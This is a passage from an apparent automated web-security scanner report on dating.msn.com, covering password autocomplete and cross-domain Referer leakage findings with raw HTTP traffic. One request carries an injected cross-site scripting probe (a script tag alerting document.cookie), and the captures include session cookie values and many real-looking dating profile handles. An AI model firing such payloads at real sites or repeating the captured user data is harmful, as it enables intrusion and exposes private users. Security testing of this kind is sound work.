Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /search/searchSubmit.aspx?8f518%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9e1add0d48d=1&ac=1&r2s=&q=woman,men,25,35&st=quicksearch&pn=1&rn=4&do=2 HTTP/1.1
Host: dating.msn.com
Proxy-Connection: keep-alive
Referer: http://burp/show/5
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; Match=CCount=1&CDate=2/11/2011; MatchSession=CDTF=2/11/2011&UMID=6f02ae30-57cc-42df-bcc5-270cd7ccc6c0; SECU=TID=516068&ESID=54e6c639-4192-42c9-91e1-9a0e0bf3a18c&THEME=214; OLN=OLNVAL=0; MatchSearchROF=ROF01=&ROF05=&ROF02=&ROF04=&ROF03=&ROF06=; msnc=1; MatchSearch=SC08=75207&SC08a=&SC11=&SC01=2&SC02=1&SC13=0&SC14=0&SC05=0&SC09=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: msnc=2; expires=Thu, 17-Feb-2011 02:09:46 GMT; path=/
Set-Cookie: MatchSearch=SC08=75207&SC08a=&SC11=&SC01=2&SC02=1&SC13=0&SC14=0&SC05=0&SC09=1; expires=Sun, 12-Feb-2012 02:09:46 GMT; path=/
Date: Sat, 12 Feb 2011 02:09:47 GMT
Content-Length: 174766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
   <head><meta http-equiv=
...[SNIP]...
<div id="bodyWrapper" class="clearfix">
           <form name="aspnetForm" method="post" action="searchSubmit.aspx?8f518%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3e9e1add0d48d=1&amp;ac=1&amp;r2s=&amp;q=woman%2cmen%2c25%2c35&amp;st=quicksearch&amp;pn=1&amp;rn=4&amp;do=2" id="aspnetForm">
<div>
...[SNIP]...
</label>
                   <input name="password" id="password" type="password" maxlength="16" />
                   <div class=" error_password fieldError ">
...[SNIP]...
</label>
                   <input name="password" id="password" type="password" maxlength="16" />
                   <div class=" error_password fieldError ">
...[SNIP]...
<dd><input name="password" id="password" maxlength="16" type="password" /></dd>
...[SNIP]...

5. Cross-domain Referer leakage  previous  next
There are 6 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


5.1. http://dating.msn.com/cp.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.msn.com
Path:   /cp.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cp.aspx?cpp=/en-us/partner/msn/38028.html&trackingid=526133&bannerid=722762&gc=1&tr=2&keyword=outdoors&gt1=26000 HTTP/1.1
Host: dating.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 12 Feb 2011 02:07:06 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=2/11/2011; expires=Sun, 12-Feb-2012 02:07:04 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=2/11/2011; domain=match.com; expires=Sun, 12-Feb-2012 02:07:04 GMT; path=/
Set-Cookie: MatchSession=CDTF=2/11/2011&UMID=3117c0bd-b2a2-42c7-9fd5-ea22006fd423; expires=Sun, 12-Feb-2012 02:07:04 GMT; path=/
Set-Cookie: SECU=TID=526133&ESID=5179d6bc-e1fe-452f-a4c7-64b19c31c524&THEME=83; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52355

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4058.16142" rel="st
...[SNIP]...
</script>


<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/google.js"></script>
<script language="javascript" type="text/javascript" src="http://cp.match.com/scripts/jquery.pngFix.js"></script>
...[SNIP]...
</style>
<link href="http://cp.match.com/en-us/partner/msn/38028.css" rel="stylesheet" type="text/css" />
<title>
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script><!--<![endif]-->

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css" rel="stylesheet" type="text/css" />

<!-- BEGIN OMNITURE REPORTING -->
...[SNIP]...
<div><img src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb"> MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home"><strong>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=AX">Bing</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://passport.match.com/passport/ppLogin.asp">Sign in</a>
...[SNIP]...
<div id="optlinks" class="link"><img class="logo" src="http://images.match.com/match/msn/cobrand/poweredby_Match.png" alt="powered by Match.com" /></div>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div id="pnlButton"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btnSearch.gif" width="144" height="29" alt="Search Now &raquo;" class="btnSearch" />
               <input type="hidden" name="po" value="1" id="po" />
...[SNIP]...
<div id="pnlButton"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btnSearch.gif" width="144" height="29" alt="Search Now &raquo;" class="btnKeywordSearch" />
               <input type="hidden" name="po" value="1" id="po" />
...[SNIP]...
<a href="/en-us/partner/msn/20400_5.html" target="_blank"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btnClickHere.gif" alt="Click Here &raquo;" width="129" height="27" border="0" /></a>
...[SNIP]...
<input id="lookingForZip" type="text" name="zip" maxlength="10"/> <img src="http://cp.match.com/en-us/partner/msn/images/viewPhotosCTA.gif" class="zipKwdSubmit" width="128" height="27" /></div>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/54/69/66035469X.jpeg" alt="SoccerGirl3381" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=SoccerGirl3381&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/54/69/66035469X.jpeg" alt="SoccerGirl3381" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/67/39/93586739A.jpeg" alt="423bergh" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=423bergh&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/67/39/93586739A.jpeg" alt="423bergh" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/67/15/93936715M.jpeg" alt="holidayinspain3" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=holidayinspain3&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/67/15/93936715M.jpeg" alt="holidayinspain3" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/35/22/98643522B.jpeg" alt="dggator81" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=dggator81&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/35/22/98643522B.jpeg" alt="dggator81" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/57/61/98085761D.jpeg" alt="Olive2882" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=Olive2882&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/57/61/98085761D.jpeg" alt="Olive2882" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/70/27/97217027B.jpeg" alt="rachmarie16" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=rachmarie16&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/70/27/97217027B.jpeg" alt="rachmarie16" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/34/25/97343425A.jpeg" alt="cat5518" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=cat5518&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/34/25/97343425A.jpeg" alt="cat5518" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/27/67/60382767C.jpeg" alt="heather4april" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=heather4april&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/27/67/60382767C.jpeg" alt="heather4april" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/44/64/81404464K.jpeg" alt="jhans2125" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=jhans2125&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/44/64/81404464K.jpeg" alt="jhans2125" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/82/16/96218216L.jpeg" alt="jopskal" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=jopskal&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/82/16/96218216L.jpeg" alt="jopskal" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/24/55/97182455G.jpeg" alt="memphis38104" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=memphis38104&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/24/55/97182455G.jpeg" alt="memphis38104" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/02/44/81480244O.jpeg" alt="ggooddggirll" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=ggooddggirll&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/02/44/81480244O.jpeg" alt="ggooddggirll" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/13/57/62661357Z.jpeg" alt="MK2324" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=MK2324&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/13/57/62661357Z.jpeg" alt="MK2324" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/93/16/97409316A.jpeg" alt="fasmjr" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=fasmjr&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/93/16/97409316A.jpeg" alt="fasmjr" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/85/15/92818515B.jpeg" alt="forever2911" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=forever2911&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/85/15/92818515B.jpeg" alt="forever2911" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/13/40/96771340A.jpeg" alt="TheOneAndOnly_1_" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=TheOneAndOnly_1_&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/13/40/96771340A.jpeg" alt="TheOneAndOnly_1_" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/83/21/68758321O.jpeg" alt="mar_kl15" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=mar_kl15&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/83/21/68758321O.jpeg" alt="mar_kl15" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/95/00/98489500A.jpeg" alt="jls2sxc" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=jls2sxc&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/95/00/98489500A.jpeg" alt="jls2sxc" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/08/23/5720823U.jpeg" alt="PrincessGirl4u" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=PrincessGirl4u&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/08/23/5720823U.jpeg" alt="PrincessGirl4u" border="0" /></a>
...[SNIP]...
<a href="/qsearch/qsearchdl.aspx?lage=20&uage=30&bd=1&bd=2&bd=3&ex=2&ex=3&ex=4&r2s=1&cpp=floatingreg/msn/default.html" target="_top"><img src="http://images.match.com/s.gif" width="80" height="100" alt="View More Profiles" /></a>
...[SNIP]...
<div id="pnlBtm"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btm.png" width="973" height="8" /></div>
...[SNIP]...

5.2. http://dating.msn.com/en-us/partner/msn/38028.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.msn.com
Path:   /en-us/partner/msn/38028.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en-us/partner/msn/38028.html?trackingid=526133&bannerid=722763&gc=1&tr=1&keyword=fireman&gt1=26000 HTTP/1.1
Host: dating.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 12 Feb 2011 02:07:02 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=2/11/2011; expires=Sun, 12-Feb-2012 02:07:01 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=2/11/2011; domain=match.com; expires=Sun, 12-Feb-2012 02:07:01 GMT; path=/
Set-Cookie: MatchSession=CDTF=2/11/2011&UMID=4dae2e45-9946-436c-9dd4-3069093b2460; expires=Sun, 12-Feb-2012 02:07:01 GMT; path=/
Set-Cookie: SECU=TID=526133&ESID=73c2152e-3473-4720-a72b-58a20e7dd9a4&THEME=84; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51850

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4058.16142" rel="st
...[SNIP]...
</script>


<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/google.js"></script>
<script language="javascript" type="text/javascript" src="http://cp.match.com/scripts/jquery.pngFix.js"></script>
...[SNIP]...
</style>
<link href="http://cp.match.com/en-us/partner/msn/38028.css" rel="stylesheet" type="text/css" />
<title>
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script><!--<![endif]-->

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css" rel="stylesheet" type="text/css" />

<!-- BEGIN OMNITURE REPORTING -->
...[SNIP]...
<div><img src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb"> MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home"><strong>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=AX">Bing</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://passport.match.com/passport/ppLogin.asp">Sign in</a>
...[SNIP]...
<div id="optlinks" class="link"><img class="logo" src="http://images.match.com/match/msn/cobrand/poweredby_Match.png" alt="powered by Match.com" /></div>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div id="pnlButton"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btnSearch.gif" width="144" height="29" alt="Search Now &raquo;" class="btnSearch" />
               <input type="hidden" name="po" value="1" id="po" />
...[SNIP]...
<div id="pnlButton"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btnSearch.gif" width="144" height="29" alt="Search Now &raquo;" class="btnKeywordSearch" />
               <input type="hidden" name="po" value="1" id="po" />
...[SNIP]...
<a href="/en-us/partner/msn/20400_5.html" target="_blank"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btnClickHere.gif" alt="Click Here &raquo;" width="129" height="27" border="0" /></a>
...[SNIP]...
<input id="lookingForZip" type="text" name="zip" maxlength="10"/> <img src="http://cp.match.com/en-us/partner/msn/images/viewPhotosCTA.gif" class="zipKwdSubmit" width="128" height="27" /></div>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/05/07/58210507J.jpeg" alt="LokiFireman" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=LokiFireman&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/05/07/58210507J.jpeg" alt="LokiFireman" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/49/19/89764919B.jpeg" alt="activoutdoorsman" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=activoutdoorsman&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/49/19/89764919B.jpeg" alt="activoutdoorsman" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/18/16/75621816B.jpeg" alt="TattooedFiremanX" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=TattooedFiremanX&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/18/16/75621816B.jpeg" alt="TattooedFiremanX" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/05/93/25780593N.jpeg" alt="hooknladr1075" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=hooknladr1075&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/05/93/25780593N.jpeg" alt="hooknladr1075" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/28/43/62122843H.jpeg" alt="fsurf62" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=fsurf62&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/28/43/62122843H.jpeg" alt="fsurf62" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/16/67/28211667D.jpeg" alt="RVRX" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=RVRX&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/16/67/28211667D.jpeg" alt="RVRX" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/08/17/69790817L.jpeg" alt="sisante55" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=sisante55&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/08/17/69790817L.jpeg" alt="sisante55" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/45/04/62854504A.jpeg" alt="jvincent333" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=jvincent333&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/45/04/62854504A.jpeg" alt="jvincent333" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/18/73/69491873G.jpeg" alt="jkfire77" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=jkfire77&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/18/73/69491873G.jpeg" alt="jkfire77" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/55/45/93765545I.jpeg" alt="tripcan" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=tripcan&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/55/45/93765545I.jpeg" alt="tripcan" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/43/41/69664341M.jpeg" alt="Kenny4021" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=Kenny4021&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/43/41/69664341M.jpeg" alt="Kenny4021" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/76/95/28237695D.jpeg" alt="Eclipse8181" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=Eclipse8181&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/76/95/28237695D.jpeg" alt="Eclipse8181" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/39/42/36373942J.jpeg" alt="bmwboy209" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=bmwboy209&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/39/42/36373942J.jpeg" alt="bmwboy209" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/64/00/96896400B.jpeg" alt="sdff93" /></div>
...[SNIP]...
